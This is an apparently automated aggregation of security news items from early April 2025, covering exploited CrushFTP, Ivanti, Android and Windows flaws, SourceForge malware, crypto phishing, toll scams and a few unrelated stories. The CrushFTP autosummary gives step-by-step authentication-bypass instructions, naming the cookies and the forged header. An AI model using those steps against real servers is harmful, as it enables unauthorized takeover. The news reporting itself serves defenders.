    2025-04-08 https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-bots-hard-at-work-spreading-political-unrest-on-romanias-internet
    Internet users in Romania are finding their social media posts and online news articles bombarded with comments promoting blatant propaganda, inciting hatred towards the EU and NATO, and support for Vladimir Putin's Russia. Read more in my article on the Hot for Security blog.

    Autosummary: Other observers have posted on Facebook evidence of how propaganda has been posted by thousands of accounts on Telegram groups in the form of comments claiming "Romanians are the servants of the Europeans, the EU is stealing our wealth, the authorities are against the people, Romanians must wake up and stop being cowards..." Ironically, some of the comments have been accidentally left in Russian rather than properly translated into Romanian.


    CISA Adds CrushFTP Vulnerability to KEV Catalog Following Confirmed Active Exploitation

    exploits
    2025-04-08 https://thehackernews.com/2025/04/cisa-adds-crushftp-vulnerability-to-kev.html
    A recently disclosed critical security flaw impacting CrushFTP has been added by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its Known Exploited Vulnerabilities (KEV) catalog after reports emerged of active exploitation in the wild. The vulnerability is a case of authentication bypass that could permit an unauthenticated attacker to take over susceptible instances. It has

    Autosummary: The Swedish cybersecurity company has since released step-by-step instructions to trigger the exploit without sharing much of the technical specifics - Generate a random alphanumeric session token of a minimum 31 characters of length Set a cookie called CrushAuth to the value generated in step 1 Set a cookie called currentAuth to the last 4 characters of the value generated in step 1 Perform an HTTP GET request to the target /WebInterface/function/ with the cookies from steps 2 and 3, as well as an Authorization header set to "AWS4-HMAC=<username>/," where <username> is the user to be signed in as (e.g., crushadmin)


    Google fixed two actively exploited Android zero-days

    exploits
    2025-04-08 https://securityaffairs.com/176337/hacking/google-fixed-two-actively-exploited-android-zero-days.html
    Google addressed 62 vulnerabilities with the release of Android's April 2025 security update, including two actively exploited zero-days. Google released Android's April 2025 security updates to address 62 vulnerabilities, including two zero-day vulnerabilities (CVE-2024-53197, CVE-2024-53150) exploited in targeted attacks. The vulnerability CVE-2024-53197 is a Linux kernel issue affecting ALSA USB audio. Malicious devices […]

    Autosummary: Pierluigi Paganini, April 08, 2025. Google addressed 62 vulnerabilities with the release of Android's April 2025 security update, including two actively exploited zero-days.


    Google fixes two actively exploited zero-day vulnerabilities in Android

    exploits
    2025-04-08 https://www.malwarebytes.com/blog/news/2025/04/google-fixes-two-actively-exploited-zero-day-vulnerabilities-in-android
    Google has issued patches for 62 vulnerabilities in Android, including two actively exploited zero-days.

    Autosummary: Technical details: The zero-days are both located in the kernel: CVE-2024-53150: an out-of-bounds flaw in the USB sub-component of the Linux Kernel that could result in information disclosure.


    Ontinue empowers organizations to mitigate phishing threats

    financial
    2025-04-08 https://www.helpnetsecurity.com/2025/04/08/ontinue-ion-for-enhanced-phishing-protection/

    Ontinue announced ION for Enhanced Phishing Protection. This new add-on service extends phishing detection and response capabilities for ION MXDR customers, significantly reducing cyber risk by handling emails reported as suspicious by end users. ION for Enhanced Phishing Protection empowers organizations to mitigate phishing threats efficiently while maximizing the ROI of their existing Microsoft Security investments. Phishing remains one of the most persistent and costly cybersecurity threats organizations face today. Despite investments in advanced security … More

    Autosummary: Key capabilities of ION for Enhanced Phishing Protection include: Automated analysis of user-reported phishing emails: ION automates the analysis of all incoming phishing alerts, examining user accounts, hosts, mailboxes, IP addresses, files, and URLs.


    Everest ransomware group’s Tor leak site offline after a defacement

    exploits ransomware
    2025-04-08 https://securityaffairs.com/176345/cyber-crime/everest-ransomware-groups-tor-leak-site-offline-after-a-defacement.html
    The Tor leak site of the Everest ransomware group went offline after being hacked and defaced over the weekend. The Everest ransomware gang’s darknet site went offline after being hacked and defaced, with victim listings replaced by the following message. “Don’t do crime CRIME IS BAD xoxo from Prague” read the message published on the […]


    New Mirai botnet behind surge in TVT DVR exploitation

    exploits
    2025-04-08 https://www.bleepingcomputer.com/news/security/new-mirai-botnet-behind-surge-in-tvt-dvr-exploitation/
    A significant spike in exploitation attempts targeting TVT NVMS9000 DVRs has been detected, peaking on April 3, 2025, with over 2,500 unique IPs scanning for vulnerable devices. [...]

    Autosummary: Most of the attacks originate from Taiwan, Japan, and South Korea, while the majority of the targeted devices are based in the U.S., the U.K., and Germany.


    Fake Microsoft Office add-in tools push malware via SourceForge

    exploits
    2025-04-08 https://www.bleepingcomputer.com/news/security/fake-microsoft-office-add-in-tools-push-malware-via-sourceforge/
    Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency. [...]

    Autosummary: Figure: Malicious project (left) and legitimate tool (right). Source: Kaspersky
    However, when users search for office add-ins on Google Search (and other engines), they get results pointing to "officepackage.sourceforge.io," powered by a separate web hosting feature SourceForge gives to project owners.


    Microsoft: Windows CLFS zero-day exploited by ransomware gang

    exploits ransomware
    2025-04-08 https://www.bleepingcomputer.com/news/security/microsoft-windows-clfs-zero-day-exploited-by-ransomware-gang/
    Microsoft says the RansomEXX ransomware gang has been exploiting a high-severity zero-day flaw in the Windows Common Log File System to gain SYSTEM privileges on victims' systems. [...]

    Autosummary: This ransomware gang has also targeted high-profile organizations, including computer hardware giant GIGABYTE, Konica Minolta, the Texas Department of Transportation (TxDOT), Brazil's court system, Montreal's STM public transport system, and government software provider Tyler Technologies.


    Microsoft April 2025 Patch Tuesday fixes exploited zero-day, 134 flaws

    exploits
    2025-04-08 https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2025-patch-tuesday-fixes-exploited-zero-day-134-flaws/
    Today is Microsoft's April 2025 Patch Tuesday, which includes security updates for 134 flaws, including one actively exploited zero-day vulnerability. [...]


    Tax deadline threat: QuickBooks phishing scam exploits Google Ads

    financial exploits
    2025-04-08 https://www.malwarebytes.com/blog/scams/2025/04/tax-deadline-threat-quickbooks-phishing-scam-exploits-google-ads
    Beware of deceptive Google Ads targeting QuickBooks and always confirm the website URL before logging in, as fake sites can bypass even 2FA.

    Autosummary: Malicious QuickBooks domains:
    quicckboocks-accounting[.]com
    quicckbooks-accounting[.]com
    quicckrbooks-acccounting[.]com
    quicfkbooks-accounting[.]com
    quichkbooks-accounting[.]com
    quicjkbooks-accounting[.]com
    quickboorks-acccounting[.]com
    quickboorks-accountings[.]com
    quicnkbooks-accounting[.]com
    quicrkbookrs-accounting[.]com
    quicrkbooks-acccounting[.]com
    quicrkbooks-accountting[.]com
    quicrkboorks-accounnting[.]com
    quicrkboorks-accounting[.]com
    quicrkbrooks-online[.]com
    quicrkrbooks-accounting[.]com
    quictkbooks-accounting[.]com
    quicvkbooks-accounting[.]com
    quicxkbooks-accounting[.]com
    quirckbooks-accounting[.]com


    Microsoft fixes actively exploited Windows CLFS zero-day (CVE-2025-29824)

    exploits
    2025-04-08 https://www.helpnetsecurity.com/2025/04/08/patch-tuesday-microsoft-zero-day-cve-2025-29824/

    April 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 120+ vulnerabilities, including a zero-day (CVE-2025-29824) that’s under active attack. CVE-2025-29824 is a use-after-free vulnerability in the Windows Common Log File System (CLFS) that can be – and is being – exploited by attackers to elevate their privileges to SYSTEM on previously compromised Windows machines. “CLFS is no stranger to Patch Tuesday – since 2022, Microsoft has patched 32 CLFS vulnerabilities, averaging … More

    Autosummary: Among the “more likely” to be exploited bugs fixed this time around are also:
    CVE-2025-27472, a flaw allowing attackers to bypass Windows Mark of the Web (MotW) defenses
    CVE-2025-27727, an EOP flaw in the Windows Installer
    CVE-2025-29809, a vulnerability that can allow authorized attackers to bypass Windows Defender Credential Guard to leak Kerberos (authentication) credentials.


    Cryptocurrency Miner and Clipper Malware Spread via SourceForge Cracked Software Listings

    exploits
    2025-04-08 https://thehackernews.com/2025/04/cryptocurrency-miner-and-clipper.html
    Threat actors have been observed distributing malicious payloads such as cryptocurrency miner and clipper malware via SourceForge, a popular software hosting service, under the guise of cracked versions of legitimate applications like Microsoft Office. "One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a

    Autosummary: Should victims click on the download button, they are served a 7 MB ZIP archive ("vinstaller.zip"), which, when opened, contains a second password-protected archive ("installer.zip") and a text file with the password to open the file. While every project created on sourceforge.net gets assigned a "<project>.sourceforge.io" domain name, the Russian cybersecurity company found that the domain for officepackage, "officepackage.sourceforge[.]io," displays a long list of Microsoft Office applications and corresponding links to download them in Russian.


    YES3 Scanner: Open-source S3 security scanner for public access, ransomware protection

    exploits ransomware
    2025-04-07 https://www.helpnetsecurity.com/2025/04/07/yes3-scanner-open-source-s3-security-scanner/

    YES3 Scanner is an open-source tool that scans and analyzes 10+ different configuration items for your S3 buckets in AWS. This includes access such as public access via ACLs and bucket policies – including the complex combinations of account and bucket settings that can make a S3 bucket effectively public. “We built this tool after realizing potential users needed a better way to scan their S3 resources for access and ransomware protection. We wanted to … More

    Autosummary: YES3 Scanner checks for the following S3 configuration items:
    Bucket Access Control Lists (ACLs)
    Bucket Policy (Resource-Based Policy)
    Bucket Website Settings
    Account Public Access Block
    Bucket Public Access Block
    Disabled ACLs (via Ownership Controls)
    Bucket Encryption Settings
    Object Lock Configuration
    Bucket Versioning Settings
    Bucket Lifecycle Configuration
    Future plans and download: “Our future plans are to include more analysis on S3 and cloud configuration such as logging to help provide holistic security against access and ransomware in the cloud.


    N-able Vulnerability Management identifies vulnerabilities across all major operating systems

    exploits
    2025-04-07 https://www.helpnetsecurity.com/2025/04/07/n-able-vulnerability-management/

    N-able announced the upcoming launch of its Vulnerability Management feature for their UEM (Unified Endpoint Management) products, N-central and N-sight. The new built-in feature will allow organizations to identify, prioritize, remediate, and report on vulnerabilities across all major operating systems (OS). With a single unified view, IT teams will gain continuous visibility to vulnerabilities, rapid prioritization, and can leverage automated workflows for remediation. There has been a rapid increase in both the volume of vulnerabilities … More

    Autosummary: Benefits of the new feature include: Complete visibility for OS and application vulnerabilities: giving technicians and security specialists important details like severity scoring and CVE details, allowing for rapid prioritization across endpoints on Windows, Mac, and Linux.


    PoisonSeed Exploits CRM Accounts to Launch Cryptocurrency Seed Phrase Poisoning Attacks

    exploits
    2025-04-07 https://thehackernews.com/2025/04/poisonseed-exploits-crm-accounts-to.html
    A malicious campaign dubbed PoisonSeed is leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email providers to send spam messages containing cryptocurrency seed phrases in an attempt to drain victims' digital wallets. "Recipients of the bulk spam are targeted with a cryptocurrency seed phrase poisoning attack," Silent Push said in an

    Autosummary: Crypto companies like Coinbase and Ledger, and bulk email providers such as Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho are among the targeted companies.


    ⚡ Weekly Recap: VPN Exploits, Oracle's Silent Breach, ClickFix Comeback and More

    exploits
    2025-04-07 https://thehackernews.com/2025/04/weekly-recap-vpn-exploits-oracles.html
    Today, every unpatched system, leaked password, and overlooked plugin is a doorway for attackers. Supply chains stretch deep into the code we trust, and malware hides not just in shady apps — but in job offers, hardware, and cloud services we rely on every day. Hackers don’t need sophisticated exploits anymore. Sometimes, your credentials and a little social engineering are enough. This week,

    Autosummary:
    This week's list includes — CVE-2025-22457 (Ivanti Connect Secure, Policy Secure, and ZTA Gateway), CVE-2025-30065 (Apache Parquet), CVE-2024-10668 (Google Quick Share for Windows), CVE-2025-24362 (github/codeql-action), CVE-2025-1268 (Canon), CVE-2025-1449 (Rockwell Automation Verve Asset Manager), CVE-2025-2008 (WP Ultimate CSV Importer plugin), CVE-2024-3660 (TensorFlow Keras), CVE-2025-20139 (Cisco Enterprise Chat and Email), CVE-2025-20212 (Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series), CVE-2025-27520 (BentoML), CVE-2025-2798 (Woffice CRM theme), CVE-2025-2780 (Woffice Core plugin), CVE-2025-31553 (WPFactory Advanced WooCommerce Product Sales Reporting plugin), CVE-2025-31579 (EXEIdeas International WP AutoKeyword plugin), and CVE-2025-31552 (RSVPMarker plugin).
    They are 123456, 1234, Password1, 12345, P@sswOrd, password, Password123, Welcome1, 12345678, and Aa123456, according to Specops, based on an analysis of 15 million passwords used to attack RDP ports.
    Multiple cybersecurity companies, including Black Kite, CloudSEK, CyberAngel, Hudson Rock, Orca Security, SOCRadar, Sygnia, and Trustwave, have analyzed and validated the data posted for sale online as directly extracted from Oracle.
    Written in Python, the malware is publicly available on GitHub and comes with capabilities to log keystrokes, run commands, record screens, gather Wi-Fi information, and steal passwords, clipboard content, and Roblox security cookies.
    It has now emerged that the popular static analysis tool, SpotBugs, was compromised in November 2024, using it as a stepping stone to compromise "reviewdog/action-setup," which subsequently led to the infection of "tj-actions/changed-files."
    ⚡ Threat of the Week: UNC5221 Exploits New Ivanti Flaw to Drop Malware — The China-nexus cyber espionage group tracked as UNC5221 exploited a now-patched flaw in Ivanti Connect Secure, CVE-2025-22457 (CVSS score: 9.0), to deliver an in-memory dropper called TRAILBLAZE, a passive backdoor codenamed BRUSHFIRE, and the SPAWN malware suite.
    Google Partners with NVIDIA and HiddenLayer for a New Model Signing Library — Google, in collaboration with NVIDIA and HiddenLayer, has announced the release of a Python library called "model-signing" that offers developers a way to sign and verify machine learning (ML) models in an effort to bolster the security of the ML supply chain and safeguard against emerging threats like model and data poisoning, prompt injection, prompt leaking and prompt evasion.
    "These vulnerabilities arise from the unsafe use of torch.load(), which is used to deserialize model checkpoints, configurations, and sometimes metadata," the CERT Coordination Center (CERT/CC) said.
    📰 Around the Cyber World: Oracle Privately Confirms Data Breach — Enterprise computing giant Oracle is reportedly informing its customers in private that hackers compromised a "legacy" Oracle environment, exposing usernames, passkeys, and encrypted passwords, contradicting its consistent public denial about the incident.
    "When people think of cybercriminals, they tend to imagine high-tech, government-backed teams and elite hackers using cutting-edge technology," Outpost24 said.
    The new standard "brings Python in line with other ecosystems like JavaScript (package-lock.json), Rust (Cargo.lock), and Go (go.sum)," Socket said.


    Security Theater: Vanity Metrics Keep You Busy - and Exposed

    industry
    2025-04-07 https://thehackernews.com/2025/04/security-theater-vanity-metrics-keep.html
    After more than 25 years of mitigating risks, ensuring compliance, and building robust security programs for Fortune 500 companies, I’ve learned that looking busy isn’t the same as being secure. It’s an easy trap for busy cybersecurity leaders to fall into. We rely on metrics that tell a story of the tremendous efforts we’re expending - how many vulnerabilities we patched, how fast we

    Autosummary: We rely on metrics that tell a story of the tremendous efforts we're expending - how many vulnerabilities we patched, how fast we responded - but often vulnerability management metrics get associated with operational metrics because traditional approaches to measuring and implementing vulnerability management do not actually reduce risk. Attackers chain together exposures - misconfigurations, overprivileged identities, unpatched CVEs - to reach high-value targets. Whether it's credential misuse, missing patches, open ports, or cloud misconfigurations, this breakdown informs both tactical response and strategic planning. Taken together and continuously updated, meaningful metrics give you more than a snapshot - they provide a living, contextual view of your threat exposure. They typically fall into three main types: Volume metrics – These count things: patches applied, vulnerabilities discovered, scans completed.


    PoisonSeed Campaign uses stolen email credentials to spread crypto seed scams and empty wallets

    financial
    2025-04-07 https://securityaffairs.com/176317/cyber-crime/poisonseed-campaign-uses-stolen-email-credentials-to-spread-crypto-seed-scams-and-and-empty-wallets.html
    A campaign named PoisonSeed uses stolen CRM and bulk email credentials to send crypto seed scams, aiming to empty victims’ digital wallets. Silent Push researchers warn of a malicious PoisonSeed campaign that uses stolen CRM and bulk email provider credentials to send crypto seed phrase spam. Victims are tricked into importing compromised seed phrases into […] "

    Autosummary: In 2025, Scattered Spider has targeted brands including: Audemars Piguet, Chick-fil-A, Credit Karma, Forbes, Instacart, Louis Vuitton, Morningstar, New York Digital Investment Group, News Corporation, Nike, Paxos, Twitter/X, and Vodafone.” concludes the report. PoisonSeed Campaign uses stolen email credentials to spread crypto seed scams and empty wallets Pierluigi Paganini April 07, 2025 A campaign named PoisonSeed uses stolen CRM and bulk email credentials to send crypto seed scams, aiming to empty victims’ digital wallets. "


    Food giant WK Kellogg discloses data breach linked to Clop ransomware

    financial exploits ransomware
    2025-04-07 https://www.bleepingcomputer.com/news/security/food-giant-wk-kellogg-discloses-data-breach-linked-to-clop-ransomware/
    US food giant WK Kellogg Co is warning employees and vendors that company data was stolen during the 2024 Cleo data theft attacks. [...] "

    Autosummary: "WK Kellogg learned on February 27, 2025, that a security incident may have occurred involving Cleo," reads the notice. "


    Toll fee scams are back and heading your way

    financial
    2025-04-07 https://www.malwarebytes.com/blog/news/2025/04/toll-fee-scams-are-back-and-heading-your-way
    Heavy incoming traffic: A new wave of toll fee scams are sweeping America. "

    Autosummary: Indicators of Compromise (IoCs): domains involved in toll fee scams. Did you know that Malwarebytes for mobile scans your texts for scams and blocks known malicious sites? These attempts come as an unexpected text message linking to a website pretending to belong to one of the US toll authorities, like E-ZPass, The Toll Roads, SunPass, or TxTag. "


    CISA and FBI Warn Fast Flux is Powering Resilient Malware, C2, and Phishing Networks

    financial exploits
    2025-04-07 https://thehackernews.com/2025/04/cisa-and-fbi-warn-fast-flux-is-powering.html
    Cybersecurity agencies from Australia, Canada, New Zealand, and the United States have published a joint advisory about the risks associated with a technique called fast flux that has been adopted by threat actors to obscure a command-and-control (C2) channel. "‘Fast flux’ is a technique used to obfuscate the locations of malicious servers through rapidly changing Domain Name System (DNS) "

    Autosummary: It can be either a single flux, where a single domain name is linked to numerous IP addresses, or double flux, where in addition to changing the IP addresses, the DNS name servers responsible for resolving the domain are also changed frequently, offering an extra layer of redundancy and anonymity for the rogue domains. "


    Six arrested for AI-powered investment scams that stole $20 million

    financial
    2025-04-07 https://www.bleepingcomputer.com/news/security/six-arrested-for-ai-powered-investment-scams-that-stole-20-million/
    Spain"s police arrested six individuals behind a large-scale cryptocurrency investment scam that used AI tools to generate deepfake ads featuring popular public figures to lure people. [...] "

    Autosummary: Moreover, 100,000 Euros, mobile phones, computers, hard drives, firearms, and documents were seized during the police raids. "


    Everest ransomware"s dark web leak site defaced, now offline

    exploits ransomware
    2025-04-07 https://www.bleepingcomputer.com/news/security/everest-ransomwares-dark-web-leak-site-defaced-now-offline/
    The dark web leak site of the Everest ransomware gang has apparently been hacked over the weekend by an unknown attacker and is now offline. [...] "

    Autosummary: "


    Google fixes Android zero-days exploited in attacks, 60 other flaws

    exploits
    2025-04-07 https://www.bleepingcomputer.com/news/security/google-fixes-android-zero-days-exploited-in-attacks-60-other-flaws/
    Google has released patches for 62 vulnerabilities in Android’s April 2025 security update, including two zero-days exploited in targeted attacks. [...] "

    Autosummary: "


    U.S. CISA adds Ivanti Connect Secure, Policy Secure and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-04-07 https://securityaffairs.com/176332/security/u-s-cisa-adds-ivanti-connect-secure-policy-secure-and-zta-gateways-flaw-to-its-known-exploited-vulnerabilities-catalog-2.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Connect Secure, Policy Secure and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Tomcat path equivalence vulnerability, tracked as CVE-2025-22457, to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability CVE-2025-22457 is a stack-based buffer overflow […] "

    Autosummary: U.S. CISA adds Ivanti Connect Secure, Policy Secure and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini April 07, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Connect Secure, Policy Secure and ZTA Gateways flaw to its Known Exploited Vulnerabilities catalog. "


    EncryptHub"s dual life: Cybercriminal vs Windows bug-bounty researcher

    exploits ciber
    2025-04-07 https://www.bleepingcomputer.com/news/security/encrypthubs-dual-life-cybercriminal-vs-windows-bug-bounty-researcher/
    EncryptHub, a notorious threat actor linked to breaches at 618 organizations, is believed to have reported two Windows zero-day vulnerabilities to Microsoft, revealing a conflicted figure straddling the line between cybercrime and security research. [...] "

    Autosummary: "The hardest evidence was from the fact that the password files EncrypHub exfiltrated from his own system had accounts linked to both EncryptHub, like credentials to EncryptRAT, which was still in development, or his account on xss.is, and to SkorikARI, like accesses to freelance sites or his own Gmail account," explained Garcia. "


    A revolution is underway in India"s trainer industry

    industry
    2025-04-07 https://www.bbc.com/news/articles/cm2nplgm2kpo
    India wants to boost the domestic trainer industry but will small domestic makers suffer? "

    Autosummary: "Most homegrown brands rely on off-the-shelf soles from the market, but when we started Comet, we realized that these were lacking in quality, durability, and grip," he says.Sabhib Agrawal is trying to get those buyers interested in barefoot footwear - shoes which, their makers say, are healthy for the foot as they encourage natural, or barefoot, movement."Many consumers, especially in rural and lower-income urban areas, opt for cheaper local footwear instead of branded options," he says. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 40

    exploits
    2025-04-06 https://securityaffairs.com/176244/malware/security-affairs-malware-newsletter-round-40.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: CISA Releases Malware Analysis Report on RESURGE Malware Associated with Ivanti Connect Secure; Unboxing Anubis: Exploring the Stealthy Tactics of FIN7’s Latest Backdoor; Advancements in delivery: Scripting with Nietzsche; Analyzing New HijackLoader Evasion Tactics; Malicious Python […] "

    Autosummary: "


    E-ZPass toll payment texts return in massive phishing wave

    financial
    2025-04-06 https://www.bleepingcomputer.com/news/security/toll-payment-text-scam-returns-in-massive-phishing-wave/
    An ongoing phishing campaign impersonating E-ZPass and other toll agencies has surged recently, with recipients receiving multiple iMessage and SMS texts to steal personal and credit card information. [...] "

    Autosummary: The messages embed links that, if clicked, take the victim to a phishing site impersonating E-ZPass, The Toll Roads, FasTrak, Florida Turnpike, or another toll authority that attempts to steal their personal information including names, email addresses, physical addresses, and credit card information. "


    Oracle privately notifies Cloud data breach to customers

    financial
    2025-04-06 https://securityaffairs.com/176278/data-breach/oracle-privately-notifies-cloud-data-breach-to-customers.html
    Oracle confirms a cloud data breach, quietly informing customers while downplaying the impact of the security breach. Oracle confirms a data breach and started informing customers while downplaying the impact of the incident. A threat actor using the moniker ‘rose87168’ claimed to possess millions of data lines tied to over 140,000 Oracle Cloud tenants, including […] "

    Autosummary: Oracle privately notifies Cloud data breach to customers Pierluigi Paganini April 06, 2025 Oracle confirms a cloud data breach, quietly informing customers while downplaying the impact of the security breach. Oracle is privately notifying customers of a breach affecting usernames, passkeys, and encrypted passwords, with the FBI and CrowdStrike investigating the incident. "


    Port of Seattle’s August data breach impacted 90,000 people

    financial
    2025-04-05 https://securityaffairs.com/176205/data-breach/port-of-seattle-august-data-breach-impacted-90000-people.html
    Port of Seattle is notifying 90,000 people of a data breach after personal data was stolen in a ransomware attack in August 2024. In August 2024, a cyber attack hit the Port of Seattle, which also operates the Seattle-Tacoma International Airport. The attack impacted websites and phone systems. According to The Seattle Times, the cyber […] "

    Autosummary: The Port confirmed that an unauthorized actor accessed and encrypted parts of their computer systems, disrupting key services like baggage handling, check-in kiosks, ticketing, Wi-Fi, and parking. Threat actors stole individuals’ information that included some combination of names, dates of birth, Social Security numbers (or last four digits of Social Security number), driver’s license or other government identification card numbers, and some medical information. "


    North Korean Hackers Deploy BeaverTail Malware via 11 Malicious npm Packages

    exploits
    2025-04-05 https://thehackernews.com/2025/04/north-korean-hackers-deploy-beavertail.html
    The North Korean threat actors behind the ongoing Contagious Interview campaign are spreading their tentacles on the npm ecosystem by publishing more malicious packages that deliver the BeaverTail malware, as well as a new remote access trojan (RAT) loader. "These latest samples employ hexadecimal string encoding to evade automated detection systems and manual code audits, signaling a variation "

    Autosummary: The packages in question, which were collectively downloaded more than 5,600 times prior to their removal, are listed below: empty-array-validator, twitterapis, dev-debugger-vite, snore-log, core-pino, events-utils, icloud-cod, cln-logger, node-clog, consolidate-log, consolidate-logger "


    Ashley Cain"s "shocking" experience in the Brazilian favelas

    latam
    2025-04-05 https://www.bbc.com/news/articles/cj0zj63yr9qo
    The ex-footballer speaks about visiting some of the world’s most dangerous environments for a new BBC series. "

    Autosummary: The presenter, who has faced the loss of his own child, says he hoped "in that moment, just to make this lady feel comforted, feel heard and feel like she had a voice to speak about all that’s wrong in that area". "


    Brazil to host Prince William"s Earthshot Prize

    latam
    2025-04-04 https://www.bbc.com/news/articles/c2kv0kpyx1yo
    The climate prize ceremony will come just before Brazil hosts the COP30 climate summit in November. "

    Autosummary: Brazil to host Prince William"s Earthshot Prize Prince William"s Earthshot Prize aims to recognise ideas and technologies that can safeguard the planet The Earthshot Prize is a 10-year project with past ceremonies held in London, Boston, Singapore and Cape Town. "


    Connected cars drive into a cybersecurity crisis

    ciber
    2025-04-04 https://www.helpnetsecurity.com/2025/04/04/cybersecurity-risks-cars/

    Technology has entered all areas of life, and our cars are no exception. They have become computers on wheels, equipped with sensors, software, and connectivity that provide safety and comfort. However, like all technological innovations, this one also brings risks, making cars vulnerable to cyberattacks. The very fact that someone can hack a vehicle and take control of it is terrifying, turning scenarios from movies into reality. Add to this the fact that software in … More

    The post Connected cars drive into a cybersecurity crisis appeared first on Help Net Security.

    "

    Autosummary: In addition, internal vehicle networks such as the CAN bus (which connects key systems like brakes and engine control) are vulnerable to tampering, potentially allowing hackers to manipulate vehicle functions, such as speed, braking, or even disabling safety features. In the event of a security breach, things like our driving data, contacts, call logs, messages, and even location info could end up in the wrong hands. Cybersecurity risks to automotive systems: Automotive systems face various cybersecurity threats, including remote hacks, physical attacks, software vulnerabilities, and malware. "


    Critical Ivanti Flaw Actively Exploited to Deploy TRAILBLAZE and BRUSHFIRE Malware

    exploits
    2025-04-04 https://thehackernews.com/2025/04/critical-ivanti-flaw-actively-exploited.html
    Ivanti has disclosed details of a now-patched critical security vulnerability impacting its Connect Secure that has come under active exploitation in the wild. The vulnerability, tracked as CVE-2025-22457 (CVSS score: 9.0), concerns a case of a stack-based buffer overflow that could be exploited to execute arbitrary code on affected systems. "A stack-based buffer overflow in Ivanti Connect "

    Autosummary: The use of SPAWN is attributed to a China-nexus adversary tracked as UNC5221, which has a history of leveraging zero-day flaws in Ivanti Connect Secure (ICS) devices, alongside other clusters such as UNC5266, UNC5291, UNC5325, UNC5330, UNC5337, and UNC3886. "


    CERT-UA Reports Cyberattacks Targeting Ukrainian State Systems with WRECKSTEEL Malware

    exploits government ciber
    2025-04-04 https://thehackernews.com/2025/04/cert-ua-reports-cyberattacks-targeting.html
    The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that no less than three cyber attacks were recorded against state administration bodies and critical infrastructure facilities in the country with an aim to steal sensitive data. The campaign, the agency said, involved the use of compromised email accounts to send phishing messages containing links pointing to legitimate "

    Autosummary: "


    OPSEC Failure Exposes Coquettte’s Malware Campaigns on Bulletproof Hosting Servers

    exploits
    2025-04-04 https://thehackernews.com/2025/04/opsec-failure-exposes-coquetttes.html
    A novice cybercrime actor has been observed leveraging the services of a Russian bulletproof hosting (BPH) provider called Proton66 to facilitate their operations. The findings come from DomainTools, which detected the activity after it discovered a phony website named cybersecureprotect[.]com hosted on Proton66 that masqueraded as an antivirus service. The threat intelligence firm said it "

    Autosummary: Proton66, also linked to another BPH service known as PROSPERO, has been attributed to several campaigns distributing desktop and Android malware like GootLoader, Matanbuchus, SpyNote, Coper (aka Octo), and SocGholish. "


    CERT-UA reports attacks in March 2025 targeting Ukrainian agencies with WRECKSTEEL Malware

    exploits
    2025-04-04 https://securityaffairs.com/176181/cyber-warfare-2/cert-ua-reports-attacks-in-march-2025-targeting-ukrainian-agencies-with-wrecksteel-malware.html
    CERT-UA reported three cyberattacks targeting Ukraine’s state agencies and critical infrastructure to steal sensitive data. The Computer Emergency Response Team of Ukraine (CERT-UA) reported three cyberattacks in March 2025 targeting Ukrainian agencies and infrastructure to steal sensitive data. This activity is tracked under the identifier UAC-0219. “The Ukrainian government’s computer emergency response team, CERT-UA, is […] "

    Autosummary: CERT-UA reports attacks in March 2025 targeting Ukrainian agencies with WRECKSTEEL Malware Pierluigi Paganini April 04, 2025 CERT-UA reported three cyberattacks targeting Ukraine’s state agencies and critical infrastructure to steal sensitive data. "


    PoisonSeed phishing campaign behind emails with wallet seed phrases

    financial
    2025-04-04 https://www.bleepingcomputer.com/news/security/poisonseed-phishing-campaign-behind-emails-with-wallet-seed-phrases/
    A large-scale phishing campaign dubbed "PoisonSeed" compromises corporate email marketing accounts to distribute emails containing crypto seed phrases used to drain cryptocurrency wallets. [...] "

    Autosummary: Coinbase-themed email with seeds for the victim to use (Source: SilentPush). That is because, when creating a new wallet, the victim isn’t using a secure, pre-generated seed phrase from the company (Coinbase) like they are made to believe, but instead using one for a wallet already under the attackers’ control. "


    SpotBugs Access Token Theft Identified as Root Cause of GitHub Supply Chain Attack

    exploits
    2025-04-04 https://thehackernews.com/2025/04/spotbugs-access-token-theft-identified.html
    The cascading supply chain attack that initially targeted Coinbase before becoming more widespread to single out users of the "tj-actions/changed-files" GitHub Action has been traced further back to the theft of a personal access token (PAT) related to SpotBugs. "The attackers obtained initial access by taking advantage of the GitHub Actions workflow of SpotBugs, a popular open-source tool for "

    Autosummary: It"s believed that the same PAT facilitated access to both "spotbugs/spotbugs" and "reviewdog/action-setup," meaning the leaked PAT could be abused to poison "reviewdog/action-setup." "The attacker somehow had an account with write permission in spotbugs/spotbugs, which they were able to use to push a branch to the repository and access the CI secrets," Unit 42 said. "


    Port of Seattle says ransomware breach impacts 90,000 people

    exploits ransomware
    2025-04-04 https://www.bleepingcomputer.com/news/security/port-of-seattle-says-ransomware-breach-impacts-90-000-people/
    Port of Seattle, the U.S. government agency overseeing Seattle’s seaport and airport, is notifying roughly 90,000 individuals of a data breach after their personal information was stolen in an August 2024 ransomware attack. [...] "

    Autosummary: According to a copy of the breach notification letters, the attackers stole employee, contractor, and parking data in various combinations, including names, dates of birth, Social Security numbers (or last four digits of Social Security number), driver’s license or other government identification card numbers, and some medical information. "


    Cybercriminals exfiltrate data in just three days

    ciber
    2025-04-03 https://www.helpnetsecurity.com/2025/04/03/breach-median-time/

